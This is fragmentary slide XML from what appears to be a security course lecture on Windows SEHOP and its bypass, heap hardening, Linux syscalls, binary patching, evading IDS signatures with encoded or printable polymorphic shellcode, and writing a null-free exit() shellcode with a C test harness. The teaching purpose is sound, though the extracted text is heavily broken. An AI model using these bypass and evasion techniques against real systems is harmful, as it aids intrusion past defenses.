            <a:ext cx="448500" cy="45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SEHOP</a:t>
            </a:r>
          </a:p>
        </p:txBody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3278883" y="1704688"/>
            <a:ext cx="54081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Introduced in win server 2008 and win 7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Comes from a Matt Miller article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http://blogs.technet.com/b/srd/archive/2009/02/02/preventing-the-exploitation-of-seh-overwrites-with-sehop.aspx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Before the exception dispatcher function jumps to the SE Records, it parses the *Next SEH record chain to make sure its intact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Final SEH record in a SEHOP validated chain is FFFFFFFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-3175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1400"/>
              <a:t>ntdll!FinalExceptionHandler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267625" y="18191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</p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1096" name="Shape 1096"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1095" idx="1"/>
            <a:endCxn id="1095" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="267625" y="24642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7" name="Shape 1097"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648625" y="3266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0x01234FE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0x0ABCFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1098" name="Shape 1098"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="953425" y="48671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0x01235A6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0x0ABD0F</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1099" name="Shape 1099"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648625" y="3912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0" name="Shape 1100"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="953425" y="55122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1" name="Shape 1101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2106925" y="21466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102" name="Shape 1102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2487925" y="37468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103" name="Shape 1103"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2792725" y="52708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104" name="Shape 1104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6611658" y="44575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 06 90 90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(short jump)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5" name="Shape 1105"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6611658" y="51742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6" name="Shape 1106"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6523683" y="40445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1107" name="Shape 1107"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6611658" y="5860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8" name="Shape 1108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="6058433" y="46301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1109" name="Shape 1109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="6058433" y="52397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1110" name="Shape 1110"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3696446" y="3466375"/>
            <a:ext cx="2918625" cy="2756275"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="110251" w="116745">
                <a:moveTo>
                  <a:pt x="9110" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="7615" y="5232"/>
                  <a:pt x="700" y="20618"/>
                  <a:pt x="140" y="31394"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-420" y="42170"/>
                  <a:pt x="2070" y="55250"/>
                  <a:pt x="5746" y="64656"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9421" y="74061"/>
                  <a:pt x="13470" y="81099"/>
                  <a:pt x="22191" y="87827"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="30911" y="94554"/>
                  <a:pt x="42310" y="101281"/>
                  <a:pt x="58069" y="105019"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73828" y="108756"/>
                  <a:pt x="106965" y="109379"/>
                  <a:pt x="116745" y="11025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111" name="Shape 1111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1736110">
            <a:off x="4624292" y="4654341"/>
            <a:ext cx="1858958" cy="1411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*Next SEH Record in the adjacent SEH Record will be overwritten with shellcode in this case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x="3709300" y="4596300"/>
            <a:ext cx="1233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Also...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SEHOP </a:t>
            </a:r>
          </a:p>
        </p:txBody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x="457200" y="1704688"/>
            <a:ext cx="57909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Bypass notes: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http://dl.packetstormsecurity.net/papers/general/sehop_en.pdf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still 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JE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>jump (0x74) and possibly still point to a valid stack address!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i.e.    74 06 90 90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also have to craft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 flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (a condition evaluate by the JE assembly instruction)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XOR EAX EAX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POP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POP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RET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still difficult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ASLR will change the address of ntdll!FinalExceptHandler each time the machine is rebooted.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still, in experimentation takes only 512 tries!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x="6611658" y="2117673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 06 90 90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0" name="Shape 1120"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6611658" y="2834396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1" name="Shape 1121"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6523683" y="1704688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1122" name="Shape 1122"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6611658" y="3520196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3" name="Shape 1123"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="6058433" y="2290263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1124" name="Shape 1124"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="6058433" y="2899863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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1125" name="Shape 1125"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6306750" y="1747200"/>
            <a:ext cx="2354400" cy="278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6" name="Shape 1126"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6306750" y="1747200"/>
            <a:ext cx="2354400" cy="278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protection (hardening)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1132" name="Shape 113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Windows and Linux both have takes on this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Mainly focuses on hardening the heap allocation algorithm, preventing heap overflows, and safe unlinking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Windows features for heap hardening / protection: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meta cookies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safe unlinking algorithm(s)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function pointer obfuscation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exploitation hurdles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138" name="Shape 113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Safe Unlinking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on unlink, the allocator </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>coalesces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, then relinks from </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>freelist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Causes the link/unlink to fail if address is readable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raises handled exception, and execution continues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chunk address still returned to caller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Cookie Checking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Cookie checks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/>
              <a:t>()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invalid cookie prevents relinking of chunk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Exploitation Tutorials (Corelan.be)</a:t>
            </a:r>
          </a:p>
        </p:txBody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https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/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https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/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https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/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https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/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https://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/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https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/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https://www.corelan.be/index.php/2010/01/26/starting-to-write-immunity-debugger-pycommands-my-cheatsheet/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b="1" lang="en" u="sng"/>
              <a:t>Win32 shellcoding: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https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/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Revisited</a:t>
            </a:r>
          </a:p>
        </p:txBody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51" name="Shape 1151"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="891867" y="2287547"/>
            <a:ext cx="4663800" cy="4140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2095599" y="1679998"/>
            <a:ext cx="5994900" cy="3033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             Linker/Compiler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53" name="Shape 1153"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3746897" y="3684099"/>
            <a:ext cx="3807300" cy="3031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      Hardware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2459425" y="4407100"/>
            <a:ext cx="1248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ASLR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1155" name="Shape 1155"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4200300" y="5337738"/>
            <a:ext cx="1353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assisted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DEP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2804625" y="3076778"/>
            <a:ext cx="1353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software </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>only </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>DEP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x="5139575" y="2599375"/>
            <a:ext cx="1364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cookies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6632499" y="2599375"/>
            <a:ext cx="1458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 SEH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x="6919075" y="2913578"/>
            <a:ext cx="1458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SEHOP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3904850" y="4575100"/>
            <a:ext cx="746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code signing checks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4806867" y="4703678"/>
            <a:ext cx="7488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N^X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> bit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68" name="Shape 1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10401"/>
            <a:ext cx="6096000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Topics!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1174" name="Shape 1174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Patching, Polymorphic Shellcode / encoding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System Calls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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>int 0x80</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>is executed by a user mode program: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CPU switches into kernel mode and executes the syscall function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Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>differs from standard Unix, as it implements </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>fastcall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>convention for calling syscalls (for higher performance)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Fastcall convention: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specific syscall number is loaded into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EAX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Arguments to the syscall function are placed in other registers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instruction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int 0x80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> is executed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CPU switches to kernel mode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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>syscall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>function is executed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Each syscall has a unique integer value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syscalls can use at most 6 arguments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places into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EBC, ECX, EDX, ESI, EDI, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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EPB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> respectively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can pass data structures here (pointers) to support more args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Patching</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1180" name="Shape 118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Used by both Good and Bad guys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Tools (any hexeditor):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hexedit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zero out or NOP out any undesired instructions!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Perhaps some malware has anti-reverse engineering code in it!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You'll have to defeat this in the homework </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>:D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patching demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1186" name="Shape 1186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defeat debugger exploits used by malware</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:b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http://blog.ioactive.com/2012/12/striking-back-gdb-and-ida-debuggers.html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Shellcode, and Encoding / Filters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1192" name="Shape 119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Ways script kiddies get caught/stopped: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Often Intrusion Detection Systems / Intrusion Prevention Systems (IDS / IPS) will inspect packets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easily detect /x90 NOP sleds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easily detect raw shellcode in some cases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detect "/bin/sh", and /bin, //sh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other giveaways that we'll cover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9" name="Shape 1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" y="93425"/>
            <a:ext cx="9080500" cy="6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Shellcode, and Encoding / Filters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205" name="Shape 120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Simple ways to get around filters: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"/bin/sh", add 5 to each byte, and then in the shellcode remove 0x5 from each byte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shown on page 359 in HAOE book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NOP sleds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large blocks of 0x90 aren't common and can be filtered out by IDS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can replace with other single-byte instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="137160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1206" name="Shape 1206"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2531550" y="369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{AC9B9B0F-E442-49EA-80F9-FC4CC93A2119}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="802800"/>
                <a:gridCol w="690700"/>
                <a:gridCol w="746750"/>
              </a:tblGrid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Instruction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HEX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ASCII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inc EAX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@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inc EBX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inc ECX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inc EDX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dec EAX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dec EBX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K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dec ECX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</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="24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dec EDX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0x4A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J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Shellcode, and Encoding / Filters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1212" name="Shape 121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target buffers may be filtered to only have printable ASCII as their input.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kernel patches will prevent binary data from being put into environment variables!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Solution for attackers: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Polymorphic printable ASCII shellcode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/>
              <a:t>polymorphic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - any code that changes itself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Goal is to write shellcode that gets past the printable character check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See page 366 in HAOE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Tools exist to automate this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msfencode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msfencode demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1218" name="Shape 1218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224" name="Shape 122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Next time we get into Networking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1225" name="Shape 1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029" y="2386312"/>
            <a:ext cx="5318771" cy="415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System Calls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most basic system call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/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 ()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exit(0);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Lets see how this works in ASM!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Compile the code with the static option with gcc to prevent dynamic linking:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="36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lang="en"/>
              <a:t> -masm=intel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-static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-o exit exit.c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System Calls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u="sng"/>
              <a:t>Now when we disassemble the binary we will see (something like):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gdb exit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set disassembly-flavor intel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disas _exit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Dump of assembler code for function _exit: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0x0804dbfc &lt;_exit+0&gt;:   mov    ebx,DWORD PTR [esp+4]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0x0804dc00 &lt;_exit+4&gt;:   mov    eax,0xfc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0x0804dc05 &lt;_exit+9&gt;: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   0x80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0x0804dc07 &lt;_exit+11&gt;:  mov    eax,0x1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0x0804dc0c &lt;_exit+16&gt;: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   0x80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0x0804dc0e &lt;_exit+18&gt;:  hlt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straight from </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>The Shellcoder's Handbook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1400" y="4557725"/>
            <a:ext cx="27174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see that we have two syscalls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System Calls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u="sng"/>
              <a:t>Now when we disassemble the binary we will see (something like):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gdb exit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set disassembly-flavor intel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disas _exit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Dump of assembler code for function _exit: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0x0804dbfc &lt;_exit+0&gt;:   mov    ebx,DWORD PTR [esp+4]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0x0804dc00 &lt;_exit+4&gt;:   mov    eax,0xfc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0x0804dc05 &lt;_exit+9&gt;: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   0x80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0x0804dc07 &lt;_exit+11&gt;:  mov    eax,0x1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0x0804dc0c &lt;_exit+16&gt;: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   0x80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0x0804dc0e &lt;_exit+18&gt;:  hlt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straight from </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>The Shellcoder's Handbook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92" name="Shape 192"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5991400" y="4557725"/>
            <a:ext cx="27174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value for EAX is being set at _exit+4 and _exit+11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System Calls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u="sng"/>
              <a:t>Now when we disassemble the binary we will see (something like):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gdb exit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set disassembly-flavor intel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disas _exit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Dump of assembler code for function _exit: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0x0804dbfc &lt;_exit+0&gt;:   mov    ebx,DWORD PTR [esp+4]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0x0804dc00 &lt;_exit+4&gt;:  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    eax,0xfc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0x0804dc05 &lt;_exit+9&gt;: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   0x80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0x0804dc07 &lt;_exit+11&gt;: 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    eax,0x1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0x0804dc0c &lt;_exit+16&gt;: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    0x80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0x0804dc0e &lt;_exit+18&gt;:  hlt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straight from </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>The Shellcoder's Handbook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99" name="Shape 199"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858051" y="3006390"/>
            <a:ext cx="21288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	eax, 0xfc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	eax, 0x1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correspond to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>252 </a:t>
            </a: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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> respectively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integers correspond in the syscall table to:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/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exit_group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:b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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>call table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704688"/>
            <a:ext cx="26517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usually in </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>/usr/include/&lt;architecture&gt;/unistd.h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exit     is #1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execve   is #11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75" y="1125163"/>
            <a:ext cx="5219700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write some shellcode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use this to write shellcode to just call exit()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need to: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Store the value of 0 into EBX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store the value of 1 into EAX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 0x80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Easy!!!  The following code will do this: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Section	.text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global	_start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_start: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ebx,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eax,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0x80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3" name="Shape 213"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="506150" y="36423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things first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http://www.corelan.be/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-4572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600"/>
              <a:t>Amazingly useful site for learning exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-4572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600"/>
              <a:t>Fantastic high-quality tutorials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-4572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600"/>
              <a:t>Run by some awesome experts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="1" marL="91440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600"/>
              <a:t>I cannot recommend them enough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Assembling it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Section	.text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global	_start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_start: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ebx, 0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eax,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0x80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Save it as "exit_shellcode.asm", and we'll use the nasm assembler to create our object file, and the GNU linker to link object files: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nasm -f elf exit_shellcode.asm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ld -o exit_shellcode exit_shellcode.o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Now we're ready to get our opcodes...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506150" y="41757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506150" y="47091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506150" y="56997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75" y="1580863"/>
            <a:ext cx="61341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the opcodes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="Shape 229"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1731725" y="3198799"/>
            <a:ext cx="1659855" cy="1012250"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="42729" w="82467">
                <a:moveTo>
                  <a:pt x="0" y="32047"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17946" y="42302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32047" y="34611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48284" y="42729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46148" y="32047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82467" y="18374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74776" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:cu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0" name="Shape 230"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2279250" y="4190713"/>
            <a:ext cx="4433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opcodes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Converted into a character string it looks like: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"\xbb\x00\x00\x00\x00"         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"\xb8\x01\x00\x00\x00"                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"\xcd\x80";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Simple!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can test it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Sample C program to test this (exit_test.c):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91440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char shellcode[]=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"\xbb\x00\x00\x00\x00"           </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="387350" lvl="0" marL="228600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"\xb8\x01\x00\x00\x00"                  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"\xcd\x80";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int main(){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	int *ret;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	ret = (int *)&amp;ret + 2;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	(*ret) = (int)shellcode;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/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="506150" y="20421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strace to verify our shellcode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24850"/>
            <a:ext cx="8991600" cy="49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 flipH="1">
            <a:off x="1037100" y="6437550"/>
            <a:ext cx="5176200" cy="2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onto useful shellcode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This demonstrated the basic inner workings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But is unusable in a real-world exploit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Most shellcode will be "injected" into a buffer allocated for user input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Likely a character array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character arrays terminate on NULL characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="3" marL="18288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'\0'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="3" marL="18288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\x00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400"/>
              <a:t>so our example would actually not work:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>"\xbb</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400" u="sng"/>
              <a:t>\x00\x00\x00\x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>"          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400"/>
              <a:t>"\xb8\x01</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400" u="sng"/>
              <a:t>\x00\x00\x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>"                 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400"/>
              <a:t>"\xcd\x80";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841" y="4876814"/>
            <a:ext cx="2978960" cy="16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Towards useful shellcode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NULL bytes will cause shellcode to fail when injected into character arrays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Need to creatively find ways to change our nulls into non-null opcodes...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i="1" lang="en" sz="3000" u="sng"/>
              <a:t>Two common methods to do this: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/>
              <a:t>1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> 	Replace assembly instructions that create nulls with other instructions that do not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using things like XOR, and AL and AH registers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kinda tricky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/>
              <a:t>2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	Craft the shellcode so that the nulls are added in at runtime... with instructions that do not create nulls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self modifying code?!?!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yep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Super tricky, need to know exact location of our shellcode in memory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We'll do this next time </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>:D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Revisiting the exit shellcode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"\xbb\x00\x00\x00\x00"    mov ebx, 0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"\xb8\x01\x00\x00\x00"    mov eax,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"\xcd\x80";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Creatively rewriting each one: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ebx, 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>			is equivalent to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xor ebx, ebx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and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eax, 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>			is equivalent to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	al, 1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6701250" y="4625000"/>
            <a:ext cx="37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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5570700" y="5148150"/>
            <a:ext cx="24294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 and AH style registers are 16 bits each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breakdown (32bit)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704688"/>
            <a:ext cx="24555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purpose 32 bit registers like EAX are actually broken up into two 16-bit "areas"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breakdown is leftover from the 1970's with the days of the 8080 processor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For: </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>backwards compatibility</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4800"/>
              <a:t>:D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="Shape 273"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3153131" y="1873519"/>
            <a:ext cx="4624800" cy="34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EAX (32 bits)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6179742" y="1560517"/>
            <a:ext cx="887625" cy="2261079"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="93433" w="35505">
                <a:moveTo>
                  <a:pt x="748" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20182" y="11959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17566" y="48585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35505" y="51948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21303" y="59423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22424" y="90443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9343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5" name="Shape 275"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3780169" y="1523144"/>
            <a:ext cx="887625" cy="2335825"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="93433" w="35505">
                <a:moveTo>
                  <a:pt x="748" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20182" y="11959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17566" y="48585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35505" y="51948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21303" y="59423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22424" y="90443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9343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6" name="Shape 276"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5362931" y="3245119"/>
            <a:ext cx="2316900" cy="34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AX (16 bits)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="Shape 277"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5452729" y="3544103"/>
